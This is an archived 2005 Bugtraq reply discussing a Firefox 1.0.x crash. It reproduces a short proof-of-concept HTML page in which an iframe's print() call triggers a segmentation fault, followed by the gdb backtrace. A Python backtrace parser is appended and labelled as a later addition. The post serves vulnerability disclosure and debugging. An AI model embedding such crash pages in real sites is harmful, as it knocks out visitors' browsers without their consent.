[38816] in bugtraq


Re: Firefox Crash??

daemon@ATHENA.MIT.EDU (Joxean Koret)
Wed May 11 21:14:57 2005

From: Joxean Koret <joxeankoret@yahoo.es>
To: orebla Orebla <info@orebla.it>
Cc: bugtraq@securityfocus.com
In-Reply-To: <20050510203852.24035.qmail@www.securityfocus.com>
Date: Tue, 10 May 2005 23:32:42 +0200
Message-Id: <1115760762.10933.5.camel@nemobox>



Hi,

This works in my Debian Box with 1.0.2:

$ export LD_LIBRARY_PATH=/usr/lib/mozilla-firefox/
$ cat test.html
<html>
<body><iframe id="pocframe" name="pocframe" src=""></iframe>
<script type="text/javascript">
window.frames.pocframe.print();
</script>
</body>
</html>
$ export LD_LIBRARY_PATH=/usr/lib/mozilla-firefox/
$ gdb /usr/lib/mozilla-firefox/firefox-bin
GNU gdb 6.3-debian
Copyright 2004 Free Software Foundation, Inc.
(...)
(gdb) run ~/tmp/test/test.html
Starting program: /usr/lib/mozilla-firefox/firefox-bin
~/tmp/test/test.html
(no debugging symbols found)
(...)
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1220601760 (LWP 17803)]
0x0875d65e in GlobalWindowImpl::MakeScriptDialogTitle ()
(gdb) where
#0  0x0875d65e in GlobalWindowImpl::MakeScriptDialogTitle ()
#1  0xb7f46635 in XPTC_InvokeByIndex ()
from /usr/lib/mozilla-firefox/libxpcom.so
#2  0x083718ae in XPCWrappedNative::CallMethod ()
#3  0x08377f21 in XPC_WN_CallMethod ()
#4  0xb7fa1506 in js_Invoke () from /usr/lib/mozilla-firefox/libmozjs.so
#5  0xb7fab51d in js_Interpret ()
from /usr/lib/mozilla-firefox/libmozjs.so
#6  0xb7fa1bcc in js_Execute ()
from /usr/lib/mozilla-firefox/libmozjs.so
#7  0xb7f7cd14 in JS_EvaluateUCScriptForPrincipals ()
from /usr/lib/mozilla-firefox/libmozjs.so
#8  0x088bd382 in nsJSContext::EvaluateString ()
#9  0x0869341a in nsScriptLoader::EvaluateScript ()
#10 0x08693092 in nsScriptLoader::ProcessRequest ()
#11 0x08692c79 in nsScriptLoader::IsScriptEventHandler ()
#12 0x088896d3 in nsHTMLScriptElement::MaybeProcessScript ()
#13 0x08657d2f in nsGenericElement::AppendChildTo ()
#14 0x086c9765 in HTMLContentSink::ProcessSCRIPTTag ()
#15 0x086c7130 in HTMLContentSink::Init ()
#16 0x0849961e in CNavDTD::AddLeaf ()
#17 0x084977ae in CNavDTD::HandleScriptToken ()
#18 0x08498f59 in CNavDTD::OpenContainer ()
#19 0x08495cbf in CNavDTD::HandleDefaultStartToken ()
#20 0x08496936 in CNavDTD::HandleStartToken ()
#21 0x08494fcb in CNavDTD::BuildNeglectedTarget ()
#22 0x08494674 in CNavDTD::~CNavDTD ()
#23 0x084aae6d in nsParser::ResumeParse ()
#24 0x084aabc0 in nsParser::ResumeParse ()
#25 0x084abe85 in nsParser::DetectMetaTag ()
#26 0x08908acd in nsDocumentOpenInfo::Open ()
#27 0x0840966a in nsFileChannel::EnsureStream ()
#28 0x083c6acb in nsInputStreamPump::OnStateTransfer ()
#29 0x083c692f in nsInputStreamPump::EnsureWaiting ()
#30 0xb7f14c21 in nsInputStreamReadyEvent::EventHandler ()
from /usr/lib/mozilla-firefox/libxpcom.so
#31 0xb7f2b297 in PL_HandleEvent ()
from /usr/lib/mozilla-firefox/libxpcom.so
#32 0xb7f2b1c4 in PL_ProcessPendingEvents ()
from /usr/lib/mozilla-firefox/libxpcom.so
#33 0xb7f2ce59 in nsEventQueueImpl::NotifyObservers ()
from /usr/lib/mozilla-firefox/libxpcom.so
#34 0x08568735 in nsBaseWidget::FreeNativeData ()
#35 0xb7a04dbf in g_vasprintf () from /usr/lib/libglib-2.0.so.0
#36 0xb79df582 in g_main_depth () from /usr/lib/libglib-2.0.so.0
#37 0xb79e05f8 in g_main_context_dispatch ()
from /usr/lib/libglib-2.0.so.0
#38 0xb79e0930 in g_main_context_dispatch ()
from /usr/lib/libglib-2.0.so.0
#39 0xb79e0ed3 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#40 0xb7c828f3 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
#41 0x08568a78 in nsAppShell::ReleaseGlobals ()
#42 0x08a0e8d4 in nsAppShellService::AttemptingQuit ()
#43 0x08c13800 in xre_main ()
#44 0x0834af24 in main ()

This is a simple bug in Firefox.

Bye,
Joxean Koret


On Tue, 2005-05-10 at 20:38 +0000, orebla Orebla wrote:
> 
> I found this script going around on the net, and it crashes Firefox for me:
> 
> <!--PROOF OF CONCEPT
> The vulnerability can be exploited with the following 2 lines of code:
> 
> <iframe id="pocframe" name="pocframe" src="about:blank"></iframe>
> <script type="text/javascript">window.frames.pocframe.print();</script>
> -->
> 
> I have WinXP SP2 and Firefox 1.0.3.
> 
> Why does Firefox crash???
> 
> PS: I did not discover the vulnerability. Sorry for the English...
> :-)
-- 
------ 
 Humanity's first sin was faith; its first virtue, doubt.
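As an added triage aid (not part of the original post), a small parser for the gdb `where` output quoted above: it re-attaches the `from <lib>` continuation lines that the archive wrapped onto their own lines, reports the frame that took the SIGSEGV, and finds the innermost libmozjs.so frame, which shows the crash is reached from page JavaScript. The sample trace is a subset of the post's own frames, embedded as constructed input.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple
# Constructed sample: the first frames of the gdb "where" output from the post, kept as the
# archive wrapped them (the "from <lib>" part of some frames landed on its own line).
SAMPLE_BACKTRACE = """\
#0  0x0875d65e in GlobalWindowImpl::MakeScriptDialogTitle ()
#1  0xb7f46635 in XPTC_InvokeByIndex ()
from /usr/lib/mozilla-firefox/libxpcom.so
#2  0x083718ae in XPCWrappedNative::CallMethod ()
#3  0x08377f21 in XPC_WN_CallMethod ()
#4  0xb7fa1506 in js_Invoke () from /usr/lib/mozilla-firefox/libmozjs.so
#5  0xb7fab51d in js_Interpret ()
from /usr/lib/mozilla-firefox/libmozjs.so
#8  0x088bd382 in nsJSContext::EvaluateString ()
"""
FRAME_RE = re.compile(r"^#(\d+)\s+0x([0-9a-fA-F]+) in (\S+) \(\)(?: from (\S+))?$")
CONTINUATION_RE = re.compile(r"^from (\S+)$")

@dataclass
class Frame:
    index: int
    address: int
    function: str
    module: Optional[str]  # None: symbol is in the main executable, not in a shared object

def parse_backtrace(text: str) -> List[Frame]:
    """Parse gdb 'where' output, re-attaching wrapped 'from <lib>' lines to their frame."""
    frames: List[Frame] = []
    for line in filter(None, map(str.strip, text.splitlines())):
        m = FRAME_RE.match(line)
        if m:
            frames.append(Frame(int(m.group(1)), int(m.group(2), 16), m.group(3), m.group(4)))
            continue
        m = CONTINUATION_RE.match(line)
        if m and frames and frames[-1].module is None:
            frames[-1].module = m.group(1)  # belongs to the frame parsed just before
            continue
        raise ValueError(f"unrecognised backtrace line: {line!r}")
    return frames

def crash_site(frames: List[Frame]) -> Tuple[str, Optional[str]]:
    """Function and module of frame #0, i.e. where the SIGSEGV was taken."""
    return frames[0].function, frames[0].module

def script_entry_frame(frames: List[Frame]) -> Optional[Frame]:
    """Innermost frame inside libmozjs.so: shows the crash is reachable from page JavaScript."""
    return next((f for f in frames if f.module and f.module.endswith("libmozjs.so")), None)
```

Frames with `module` set to None resolved inside firefox-bin itself, which is why frame #0 carries no `from` clause in the post.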
